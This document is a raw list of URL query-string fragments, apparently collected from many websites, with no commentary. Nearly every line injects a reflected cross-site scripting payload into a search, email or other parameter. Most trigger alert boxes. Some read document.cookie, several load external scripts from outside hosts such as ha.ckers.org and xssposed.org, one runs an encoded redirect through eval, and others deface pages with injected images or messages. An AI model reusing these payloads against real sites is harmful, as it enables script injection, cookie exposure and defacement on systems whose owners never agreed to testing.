&Zoe=%22|alert%28%22XSS%22%29|%22&ZoeSitIdt=147
&searchText=%22---%3Cscript%3Ealert(%22Hello%20Reddit%22);%3C/script%3E&imprint=000&region=9&searchType=As&searchBy=subTitle&search_dropdown=0
&sid=&p=&q=%27*alert%28%27XSS%27%29*%27
&payphone=977&country=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E
&k=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
&clientAccnum=938022&clientSubacc=0000&formName=43cc&language=English'%20STYLE='display:block;position:absolute;top:0;left:0;width:999px;height:999px;'%20onmouseover='alert(/XSS/)&allowedTypes=0000023138:840,0000023139:840,0000000216:840&subscriptionTypeId=0000000216:840
&user=<script>alert('Hey reddit')</script>
&p=Search%22%3E%3Cscript%3Ealert%28%22Tom%20Coburn:%20International%20A**hole%20of%20Mystery%22%29;%3C/script%3E%3Cimg%20src=%22http://img404.imageshack.us/img404/9195/coburnaustinpowers.jpg%22%20style=%22position:absolute;top:100;%22%20%3E%3Cdiv%20%20&filter=0&num=10&q=
&theStyle=COABETA&lang=en%22%3E%3Cscript%3Ealert%28%22Silly%20NRO,%20XSS%20is%20for%20kids!%22%29;document.write%28%22%3Cimg%20src=%27http://img651.imageshack.us/img651/2102/6a00d83451c49a69e201348.jpg%27%20style=%27display:block;position:absolute;top:0;left:0;%27/%3E%22%29;%3C/script%3E
&topic=The%20O%27Reilly%20Store%3E%3C/title%3E%3C/head%3E%3Cbody%20onload=%22alert%28%27Fuck%20it!%20We%60ll%20do%20it%20live!%27%29;%22%20%3E%3Cimg%20src=%22http://bit.ly/h52DeS%22%20style=%22position:absolute;top:0;left:0;width:250px%22/%3E
&q=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
&q=constructor0alert(document.cookie)&kl=split&kp='%0Ax=(&ks=,rq)[&kw=,kl](&ka=|0)%0A&kt=%0Ay=(&ky=,x[&kk=,0])%0A&kf=%0Az=(&kc=,x[&ke=,1])%0A&kr=%0Ay=y[&ko=,y][&kj=,y]%0A&kz=%0Ay(&kg=%2Bz)(&kh=)%0A'
&wpmlmethod=optin&wpmlformid="><script>alert(String.fromCharCode(88,83,83))</script>
&o=&q=%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27lol+porn+xss%27%29%3B%3C%2Fscript%3E
&catId=%22%3E%3Cbody%20onload=%22alert%28%27XSS%27%29%22%3E&mid=&f=&f=&f=&p=
&focus=site&query=--%253E%253Cbody%2520onload=alert%28%2522XSS%2522%29%253E%253C!--
&q=%27%29;alert%28%27XSS%27%29;//
&SearchTerm=%27+%0A%09%09%09%09%09%09};+%0A%09%09%09%09%09%09alert%280%29;+%0A%09%09%09%09%09%09a%20=%20{+%0A%09%09%09%09%09%09%09%27a%27+:+%27
&keyword=%3B!--%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E%3D%26{%28%29}
&q=';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
&site=wnews&client=wnews&output=xml_no_dtd&ie=UTF-8&oe=UTF-8&filter=p&getfields=wnnis&sort=date:D:S:d1&lr=-lang_ja&proxystylesheet=wnews&partialfields=-wnnis:NOAVSYND&q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28S
&pscNotFound=Y&actualRadius=15&ErrorMsg=';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E+';alert(String.fromCharCode(88,83,83))//\\';alert(S+LA+90210&address_selected=';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&city_selected=';alert(String.fromCharCode(88,83,83))//\\';alert(S&facility_type=GLUCOSE+TOLERANCE&employment=&radius_selected=15&search_by_state=&state_selected=LA&zip_selected=90210&service_types=1&flow_from=patient&&call_from=hcp_psc_srch_results.jsp&browser=nonie&view_reload=Y
&search=%3CSCRIPT/SRC%3D%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E&st=0&submit=Search
&firstname=%22%3E%3Cscript%3Edocument.body.innerHTML%20%3D% 20%22%3Cblink%20style%3D'color%3A%20red%3B%20font-size%3A%2080px%3B'%3ELocked%20my%20ass!%3C% 2Fblink%3E%22%3B%3C/script%3E%3Cx
&photo_num=9%22;alert('xss');//
&term=<script>alert("HI REDDIT")</script>
&q=%22%20style=%22visibility:hidden%22%3E%3C/iframe%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Ciframe style=%22visibility:hidden%22%3E&btnG.x=0&btnG.y=0&btnG=Go&entqr=0&ud=1&sort=date:D:L:d1&output=xml_no_dtd&oe=UTF-8&ie=UTF-8&client=result_only&proxystylesheet=result_only&site=ng
&return=%22%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E
&keyword="><script>alert('XSS')</script>
&rm=listresults&filter=datedesc&keywords=%3C/script%3E%3Cscript%20src=http://goonmaster.agilityhoster.com/replace.js%3E%3C/script%3E%3Cscript%3E&x=0&y=0
&uq=and(/></script><script>alert('0');</script>)
&searchtext=%3Cscript%3Ealert%28%22xss%22%29%3B%3C%2Fscript%3E&action=search
&q=/></script><script>alert('XSS');</script>
&msg=/></script><script>alert('0');</script>&typ=sys
&product=edpr&additional="><script>alert(String.fromCharCode(88,83,83))</script>
&q=%27;//\\%22;alert%280%29//--%3E%3C/script%3E%22%3E%27%3E%3Cscript%3Ealert%280%29%3C/script%3E
&ie=utf8&site=CBC&output=xml_no_dtd&getfields=description&oe=utf8&safe=high&q=%27;alert%280%29//\\%27;
&q=<script>alert%28"XSS"%29</script>
&q=%22%3E%27%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E
&query=%3Cscript%3Ealert(%22xss%22)%3C/script%3E&src=en&dst=en&v=1.0
&searchinput=alert(0);</script>">'><script>alert(0);</script>
&search="><script>alert('0');</script>
&query=%22;//--%3E%22%3E%27%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E
&keyword=k61161&pageid=icb.page316368&pageContentId=icb.pagecontent828781&view=view.do&state=maximize&viewParam_q=<script>alert('0');</script>
&q=<script>alert('0');</script>
&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&sl=zh-CN&tl=en&u=http://www.govsb.org/blog/306.html
&q=%3Cscript%3Ealert(0);%3C/script%3E&hobSearch.x=0&hobSearch.y=0
&page=search&Searchset=3&SearchString=%22><script>alert%28%22XSS%22%29</script><div%20%22
&m=search&o=%22%2f%3E%3Cscript%3Ealert%28%27xss%27%29%3b%3C/script%3E
&queryText=">'><script>alert('0')</script>
&search=%22%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E
&keywords=%22%2f%3E%3Cscript%3Ealert%28%27xss%27%29%3b%3C%2fscript%3E
&searchfor=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cdiv%20%22&incWriters=&incPublishers=&incArtists=&incAltTitles=&TypeOfSearch=title
&q=';%3C/script%3E%3Cscript%3Ealert(0);%3C/script%3E
&t=1&cve_id="</title><body onload=alert("XSS")>
&s=%22%2F%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&searchtype=IT+Blogs&x=0&y=0
&id=403/403478&key=2&query=%3C/script%3E%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
&errorMessage=I%27m%25 20sorry%2C%2520the%2520Password%2520Assistance%2520page%2520is%2520temporarily%2520unavailable.%2520 %2520Please%2520try%2520again%2520in%252015%2520minutes.%3C"<marquee><img src=k onerror=alert("XSS") />
&search=%3Cdiv+style%3D%22width%3A100%25%3Bheight%3A100%25%3Bposition%3Aabsolute%3Btop%3A0%3Bleft%3A0%22+onmouseover%3D%22alert%280%29%3B%22%3E%3C%2Fdiv%3E
&search="><script type="text/javascript">alert("Hello Dave");</script>
&q=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&cmd=ok&typeSearch=web&x=0&y=0
&offer="/><script>alert('JavaScript causes cancer')</script><br
&teamno=&type=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E
&q=%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Ctitle%3E&s=Search
&q=xss
&pageid=198&search=1&teams=</script>">'><script>alert(String.fromCharCode(88,83,83))</script>
&q=%22%29%3B+alert%281%29%3B+%2F%2F&aff=1100
&m=02&y=%3CSCRIPT%20SRC=http://xss.jgate.de/world.js%3E%3C/SCRIPT%3E
&Id=408"><script>alert(String.fromCharCode(88,83,83))</script>
&utm_source=twitterfeed&utm_medium=twitter
&sl='"--></style></script><script>alert(document.cookie)</script>
&authenticationKey=aaaaaaaaaaaaaaaaaaaaaaaaaaa&language='"--></style></script><script>alert(document.cookie)</script>
&PAGE="><script>alert('XSS')</script>
&email=zead19_2010@hotmail.com&id="><script>alert('XSS')</script>
&query=bibit&start=85&search=1&results=10%22%27/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
&search=simple&queryText=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=%22&collection=us
&c=SXM_Channel_C&childpagename=SXM%2FSXM_Channel_C%2FChannelDetail&cid=--><script>alert('0');</script>&pagename=SXM%2FWrapper
&keywords=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cimg+src%3D%22
&create=kb:USPSFAQ&search=\\%22;}%3C/script%3E%3Cscript%3Ealert%28%27Hi%20Reddit%27%29;%3C/script%3E&searchProperties=type:natural&naturalAdvance=false&varset%28source%29=sourceType:search
&template=en_search_error&postalCode=\\';alert(0)//
&fh_Params=query_origin%3Dhost_frs-app02.frs.local_code_FasGetAll%26method%3DgetAll%26omitxmldecl%3Dyes%26fh_location%3D%252f%252ffrs%252fnl_NL%252fsite%253e%257bfreerecordshop%257d%252fcategories%253c%257bfrs_02%257d%252fcategories%253c%257bfrs_02_films1%257d%252fproducttype%253d81%252fnewrelease%253d0%26fh_eds%3D%25c3%259f%26fh_sort_by%3Dpopularity_frs_nl&SubCat=02%22-alert%28%22XSS%22%29-%22
&blogid=120
&rtn='+alert('XSS')+'&st=1&email=lol@lol.com
&q=%3Cscript%3Ealert%28%27X-D+xss+again+%3A-%28%27%29%3C%2Fscript%3E&xsubmit=Search
&keyword=%22%3E%3Cscript%3Ealert%28%270%27%29;%3C/script%3E
&q=%22;alert%280%29//&proxystylesheet=sp-us&site=sp-us
&sku=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&shopid=100001&_requestid=426505
&q=%22%3E%3Cscript%3Ealert%28%22o%22%29%3C%2Fscript%3E
&keywords="+type="image"+src='http://static.reddit.com/reddit.com.header.png'
&pageAction=search&text=%3C/script%3E%3Cscript%3Ealert%280%29;%3C/script%3E
&lang=en_GB&word1=%3CIMG+SRC%3Dhttp%3A%2F%2Fbestuff.com%2Fimages%2Fimages_of_stuff%2F64x64crop%2Fdavid-hasselhoff-6442.jpg%3F1173013118%3E&word2=good%20taste
&focus=site&query=%3Cscript%3Ealert%28%22O%22%29%3C%2Fscript%3E&search=+
&q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
&l=sem&ifr=1&qsrc=999&q=%22%3E%3Cscript%3Ealert(%22O%22)%3C%2Fscript%3E&siteid=15142&o=15142&ar_uid=92870BDC-560E-4FB3-A36E-5798824C02D1&click_id=C48A76B3-2E24-4D2D-9F9E-815DD58C9203
&qs=manutd_frontend&catTxt=All&searchText=<script>alert('XSS')</script>
&queryText=%22/%3E%3CscRipt%3Ealert%28%22XSS%22%29%3C/scRipt%3E
&iama=' onmouseover='alert("XSS")' style="position:absolute;top:0;left:0;width:100%;height:100%;background:url('http://is.gd/rc7syX')" name='
&q=%2522%252F%253E%253Cscript%253Ealert%2528%2522XSS%2522%2529%253C%252Fscript%253E%253Cdiv+id%253D%2522
&q=%22%3E%3Cscript%3Ealert%28/XSS%20by%20CyberVillian/%29;%3C/script%3E
&q=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&'"--></style></script><script>alert('XSS')</script>
&video_query=%27%27}}%29%3Balert%28%27XSS%27%29%3Bvar%20a%3D%28{b%3A{b%3A%27
&p=37
&src=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&content=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
&email=%22%20/%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E
&k="><script>alert('0');</script>
&debug=true&heroOverride=%3Cscript%3Ealert%28%27hax%27%29%3C%2Fscript%3E
&cn=<script>alert('0');</script>
&search_term=%22%3E%3Cimg%20src%3Dhttp://i.imgur.com/KYRF0.jpg%20height%3D600%20width%3D450%3E
&h=195&q=90&src=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%281234567890%29%3C%2fScRiPt%3E&w=540&zc=1
&ch=Hardware&search=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
&search=%3Cimg%20src=http://hacktalk.net/pwnt.png%20/%3E
&fruitid=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
&email="/><script>alert(0)</script><script>alert(document.cookie)</script>
&q="><script>alert("xss")</script>
&email=--></script><script>alert('0');</script>
&q=%22ri%22-alert(%22XSS%22)-%22lo%22
&where=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&loctypes=1003%2C1001%2C1000%2C1%2C9%2C5%2C11%2C13%2C19%2C20&from=hdr_localsearch
&q=<script>alert('0')</script>
&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29&utm_content=Google+Reader
&clickTAG=http://www.youtube.com/watch
&text=%3Cscript%3Ealert('test')%3C/script%3E
&cx=partner-pub-1783560022203827%3Anpr2q7v5m6t&cof=FORID%3A11&ie=ISO-8859-1&q=%22%3E%3Cimg%20src=http://i.imgur.com/P8mL8.jpg%3E%3Csvg%3E%3Cscript%3E%3C!%3Ealert%28%22XSS%22%29%3C/script%3E
&phish_id=%22%3E%3Cinput%20type=submit%20value=CLICK%A0HERE%A0TO%A0TRIGGER%A0XSS!%20onClick=confirm%28navigator.userAgent%29;alert%28/XSS%A0EXAMPLE/.source%29;eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,97,115,115,105,103,110,40,34,104,116,116,112,58,47,47,110,121,97,110,46,99,97,116,34,41));BODY%20BGCOLOR=%22#111111%22%3E
&v=';alert();a='
&content_selector=gold-platinum-searchable-database&artist=\\'-alert%28String.fromCharCode%2888,83,83%29%29;//
&query=%22%3E%3Cscript%20type=%22javascript%22%3E%3C/script%3E
&hdrFo=mthdr02%27"--><svg><script><!>alert('XSS');document.location.replace('http://xssed.com')</script>
&type=keywords&term='};alert('hi');a(function(){a(function(){%2f*&location=&CMP=AFC-NLCN&x=9&y=6
&_nfpb=true&_pageLabel=Page_Search_searchResult&pageID=PSE_0001&topSearchQuery=awdawdawdttttt';alert('xss')//
&SearchTerm=awdawdawdawd%22,%22%22,%22%22,%22%22);alert(%22Reddit%20rulez!!!%22);//
&MAX_FILE_SIZE=10485760&url=%22%3E%3Cimg%20src=http://i.imgur.com/P8mL8.jpg%3E%3Csvg%3E%3Cscript%3E%3C!%3Ealert%28%22XSS%22%29%3C/script%3E&search=search&nsfwfilter=on
&text=awdawdawd%27%3balert%28%22xss%22%29%3b%2f%2f
&page=servicefaq&geo='-location.replace('//1653309246')-'&product=ipad
&adID=DEGWORDSTATUS&orderNum=%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E&postal=50210
&l=eaedfaedae%22);}alert('xss');{//
&lsort=speaker&day=9%3Cimg%20src=http://i.imgur.com/P8mL8.jpg%3E%3Csvg%3E%3Cscript%3E%3C!%3Ealert%28%22XSS%22%29%3C/script%3E&conference=interactive&a=a
&DM_NUMBER="><img/onerror=document.write('\\x58\\x53\\x53'); src=./>
&o=%22%3E%3Cscript%3Evar%20asd='&id=';alert(document.cookie)%3C/script%3E&c=1&v=2&xc=A7E3B9E1#
&cof=FORID%3A9&u=%2F&i=93.96.45.41&cx=007197795867691607395%3Ajdouk1cllf0&q=a%22;alert('xss');x=%22;&sa=Search
&destinationSectionUniqueName=search&publicationName=ind&sortString=publishdate&sortOrder=desc&sectionId=506&articleTypes=news&pageNumber=1&pageLength=10&startDay=1&startMonth=1&startYear=2010&useSectionFilter=true&useHideArticle=true&searchString=awdawd%22;alert('xss');x=%22)
&q=a";alert('xss!!!');x="&offset=0&submit=Go
&facilityName=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&op=%3C/h3%3E%3Cscript%20type=%22text/javascript%22%3Ealert(%22Derp%22);%3C/script%3E
&yr=%3Cbody%20background=http://i.imgur.com/dUS0k.gif%3E&month=05
&node=--><svg><script><!>alert("XSS")</script>
&querystring='-prompt(%22XSS%22)-'&submit=+Search+&view=internal&pubName=sol&p=sun&bl=on&navigators=&offset=0&sortby=
&url=*/%22%3E%3C/textarea%3E%3Cscript%3Ealert(&title=1%22);%3C/script%3E
&searchtext=%3Cscript%3Ealert%280%29%3C%2Fscript%3E&x=0&y=0
&utilitycode=wxKzWlc34-1765&newMemberText=%3Cp%3E%3Cb%3EEasiest%20XSS%20ever!%20Holy%20crap!%3C/b%3E%3C/p%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&keyword=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&firstsearch=1&key=title&match=loose&value=%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E
&';}},{scope:'email,user_about_me,user_hometown,user_interests,user_likes,user_status,user_website,user_birthday,publish_stream,publish_actions,offline_access'});}alert(0);b=function(response){c=({a:{//
&<script>alert(1)</script>
&searchterm=%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E
&c1=sg%22%3E%3Cscript%3Ealert%28%22NullCrew%22%29%3C/script%3E
&t=2444
&text=%3C%2Fgrkgnern%3E%3Cfpevcg%3Enyreg%280%29%3C%2Ffpevcg%3E
&source=20121104_final_push_video#!/
&s=test%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ehello&lang=en
&redirectUri=%22%2f%3e%3c%6d%61%72%71%75%65%65%3e%6c%6f%6c%3c%2f%6d%61%72%71%75%65%65%3e
&v=zTD4CYnm34c
&kid=TTB2
&q=hi.com%27%20style%3d%27height:10000px%27%20onmouseover%3d%27alert%28%22xss%22%29
&q=test&max=100&adv_age=1100&server=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
&v=s_78bk3dZcc
&mode=try&partner=Shopify&country=%22%3E%3Cimg%20src=x%20onerror=prompt%28/@The_Pr0ph3t/%29;%3E
&s=test%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ehello&lang=en
&err=1&locationTerm=2031'});}catch(err){}alert(0);try{alert(a={'asd':'a
&md5=8780800e375e1ec86cb11a076dffcb61
&categoryid=529&msg=';alert(String.fromCharCode(71,117,105,100,111,90,32,88,83,83))//\\';alert(String.fromCharCode(71,117,105,100,111,90,32,88,83,83))//";alert(String.fromCharCode(71,117,105,100,111,90,32,88,83,83))//\\";alert(String.fromCharCode(71,117,105,100,111,90,32,88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(71,117,105,100,111,90,32,88,83,83))</SCRIPT>
&wd=%3Cimg+src%3D%40+onerror%3Dalert%282
&h=4&z=350&al='><script>alert(1234)</script>&st=y
&url=javascript:alert(0)
&uem=%3Cscript%3Ealert(%27%2b/hi/.toString().substring(1,3))%3C/script%3E
&id=101;alert('xss')
&Search=abc123<%2Ftitle><script>alert('1')<%2Fscript>&Option=All&Find=Find
&name=%27;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//\\%27;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//%22;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//\\%22;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29%3C/SCRIPT%3E&size=XSS-by-GuidoZ
&id=11
&id=%27;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//\\%27;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//%22;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//\\%22;alert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2871,117,105,100,111,90,32,88,83,83%29%29%3C/SCRIPT%3E
&sDNSLookup=ANY&fDNSLookup=davealger.info
&a=0I_2QhAGaI8&u=%2Fwatch%3Fv%3DTnZ7unBHWLQ%26feature%3Dshare
&query=%3Cscript%3E+alert%28%22XSS%22%29%3B+%3C%2Fscript%3E&page=1&hitsPerPage=25&sortBy=RELEVANCY&lang=English&srchIn=ALLRESEARCH&src=&athrT=10&cmpT=10&pgT=10&_xpn=false
&cx=008267139695251349397%3A3kau9exrwow&cof=FORID%3A10&ie=UTF-8&q=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Cinput+type%3D%22text&x=0&y=0
&q=%3Cscript%3Ealert%28%22XSS%22%29%3b%3C%2fscript%3E&p=0
&q=%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
&keyword=XSS%22autofocus%2FXSS%2Fonfocus%3D%22alert%28%2FXSSPOSE%2F%29
&s=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
&keyword=%22%3E%3C/input%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C/script%3E%3Cinput%20type%3D%22text
&query=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&x=0&y=0
&keywords=--%3E%3C/script%3E%3Cscript%20%0D%0A%3Ealert%28/XSSPOSED/%29%3b%3C/script%3E
&clicktag=javascript:alert%28/XSSPOSED/%29
&clickTAG=javascript:alert%28/XSSPOSED/%29
&query=%22%3E%3Cbody%2Fonpageshow%3D%28alert%29%28%2FXSSPOSED%2F%29%3E
&query=Search+RMRS...%22%3E%3Cscript%3E%2B-%2B-1-%2B-%2Balert%28%2FXSSPOSED%2F%29%3C%2Fscript%3E
&page_function=search&keyword=x=eval%28eval%28eval%28eval%28eval%29%29%29,%20alert%28/1/%3C/xmp%3E%22%22%3E%3E%3C%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E%3C!--%29%29;x=eval%28x%29&x=17&y=10
&%22%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3EinvocationType=enus-mh-1_-aol-ws-na-na&sourceType=150&query=icq
&id=%22/%3E%3Cscript%20src=https://xssposed.org/1.js
&output=xml_no_dtd&client=default_frontend&proxystylesheet=default_frontend&q=Test%27-alert%28%27XSSPOSED%27%29-%27
&success_page=%2F%22%3E%3Ch1%3EXSS%20by%20PsychoMantis%3C/h1%3E%27%22%3E%3C/title%3E%3Cscript%3E%20alert%28%22XSSPOSED%22%29%3C/script%3E%3E/
&lang=%22%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E
&wBumper=fullexternal&advertiser=%27;}--%3E%3C/script%3E%3Cscript%3Ejavascript:prompt%28/XSSPOSED/%29%3C/script%3E
&q=%22%3E%3Cscript%3E+-+-1-+-+alert%28/XSSPOSED/%29%3C/script%3E
&redirAuth=nauth&s_cu=javascript:alert%28/XSSPOSED/%29
&m=%3Cscript%3E%20alert%20%28%27XSSPOSED%27%29;%20%3C/script%3E
&action=subscribe&email=%3Cscript%3Ealert%28String.fromCharCode%2888,%2083,%2083,%2080,%2079,%2083,%2069,%2068%29%29%3C/script%3E
&popup=%3C/script%3E%3Cscript%3Ealert%28/XSSPOSED/%29;%3C/script%3E
&fname=%3Cscript%3Ealert%28%27XSSPOSED%27%29%3C/script%3E
&q=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F
&qt=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfun
&action=find&find=%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E
&query=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F&publication=TAL+2008&x=0&y=0
&find=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F
&keyword=%27%3Balert%28%2FXSSPOSED%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F%26q%3D%27%3Balert%280%29%2F%2F\\%27%3Balert%281%29%2F%2F%22%3Balert%282%29%2F%2F\\%22%3Balert%283%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%2FXSSPOSED%2F%29%3C%2FSCRIPT%3E%3D%26{}%22%29%3B}alert%286%29%3Bfunction%2Bxss%28%29{%2F%2F
&q=<script>alert(/XSSPOSED/)</script>
&term=%22%3C/script%3E%3Cscript%3Ealert%28%22xss%22%29%3B%3C%2Fscript%3E%3C!--
&s=t&q=%27;alert%28/XSSPOSED%29//\\%27;alert%281%29//%22;alert%282%29//\\%22;alert%283%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E=&{}%22%29;}alert%286%29;function+xss%28%29{//&q=%27;alert%280%29//\\%27;alert%281%29//%22;alert%282%29//\\%22;alert%283%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28/XSSPOSED/%29%3C/SCRIPT%3E=&{}%22%29;}alert%286%29;function+xss%28%29{//l=dir&qsrc=2891&o=10300
&url=javascript:alert%28document.domain%29
&qt=i&rt=r&w0=%27%22%3E%3C/title%3E%3Cscript%3E%20alert%28%22XSSPOSED%22%29%3C/script%3E%3E/
